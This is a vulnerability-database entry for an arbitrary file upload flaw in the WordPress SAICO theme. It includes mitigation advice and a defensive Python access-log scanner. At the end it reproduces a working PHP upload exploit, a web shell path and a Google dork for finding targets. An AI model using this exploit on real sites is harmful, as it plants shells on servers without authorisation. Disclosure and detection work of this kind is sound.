Vendor: SAICO
By: Byakuya
CVSS: 7.5 (HIGH)
Vulnerability: Arbitrary File Upload
CWE: 434
Product Name: SAICO
Affected Version From: v1.0
Affected Version To: v1.0.2
Patch Exists: YES
Related CWE: N/A
CPE: a:themeforest:saico
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2013

WordPress SAICO theme Arbitrary File Upload Vulnerability

An arbitrary file upload vulnerability in the WordPress SAICO theme allows an attacker to upload a malicious PHP file to the server. This is done by sending a POST request to the php.php file in the theme's framework/_scripts/valums_uploader/ directory, with the file passed in the qqfile parameter. The uploaded file can then be accessed under the uploads directory, for example at http://site.com/wordpress/wp-content/uploads/2013/10/up.php.

Mitigation:

Update the theme beyond the affected versions (v1.0 to v1.0.2) and apply all security patches. Additionally, configure the application to accept uploads only of files with the appropriate MIME type.
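
To check whether a site was hit before it was patched, the access log can be searched for the two requests this advisory describes: a POST to the theme's uploader script, then a request for a script under wp-content/uploads. The following is an added example, not part of the original advisory; it assumes Apache/nginx combined log format, and the function name, extension list and sample log lines are constructed for illustration.

```python
import re

# Combined Log Format: ip - - [time] "METHOD path HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Uploader endpoint named in the advisory (case-insensitive, any install prefix).
UPLOADER_RE = re.compile(
    r'/wp-content/themes/saico/framework/_scripts/valums_uploader/php\.php(?:\?|$)', re.I)
# Any PHP-like script requested from the uploads tree, where no script should run.
UPLOADS_PHP_RE = re.compile(
    r'/wp-content/uploads/[^?]*\.(?:php\d?|phtml|phar)(?:[/?]|$)', re.I)


def scan_access_log(lines):
    """Return findings as dicts: kind is 'uploader_post' or 'uploads_script_hit'."""
    findings = []
    posted_from = set()  # client IPs that POSTed to the uploader earlier in the log
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, method, path, status = m["ip"], m["method"], m["path"], int(m["status"])
        if method == "POST" and UPLOADER_RE.search(path):
            posted_from.add(ip)
            findings.append({"line": lineno, "ip": ip, "kind": "uploader_post",
                             "path": path, "status": status, "correlated": False})
        elif UPLOADS_PHP_RE.search(path) and status < 400:
            # A successful response for a script in uploads is the key indicator.
            findings.append({"line": lineno, "ip": ip, "kind": "uploads_script_hit",
                             "path": path, "status": status,
                             "correlated": ip in posted_from})
    return findings


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [19/Oct/2013:10:01:02 +0000] "POST /wordpress/wp-content/themes/saico/framework/_scripts/valums_uploader/php.php HTTP/1.1" 200 31 "-" "-"',
    '198.51.100.7 - - [19/Oct/2013:10:01:09 +0000] "GET /wordpress/wp-content/uploads/2013/10/up.php HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.5 - - [19/Oct/2013:10:02:00 +0000] "GET /wordpress/wp-content/uploads/2013/10/logo.png HTTP/1.1" 200 9000 "-" "-"',
    '203.0.113.5 - - [19/Oct/2013:10:03:00 +0000] "GET /wordpress/wp-content/uploads/2013/10/old.php HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

A finding with correlated set to True means the same client address used the uploader earlier in the log; uncorrelated hits on scripts in the uploads tree still warrant inspection of the file on disk.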

Exploit-DB raw data:

###################################################################################################
#_________            .___        _______                ___.   .__       
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____ 
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/
###################################################################################################
# Exploit Title: WordPress SAICO theme Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 10/19/2013
# Vendor Homepage: http://themeforest.net/
# Themes Link: http://themeforest.net/item/saico-powerful-wordpress-theme/2082434
# Affected Version: v1.0 - v1.0.2 
# Price: $45
# Category: webapps/php
# Google dork: inurl:wp-content/themes/saico/
###################################################################################################

# Exploit

<?php
$uploadfile = "up.php";
$ch = curl_init("http://site.com/wordpress/wp-content/themes/saico/framework/_scripts/valums_uploader/php.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('qqfile'=>"$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

#Shell path: http://site.com/wordpress/wp-content/uploads/2013/10/up.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################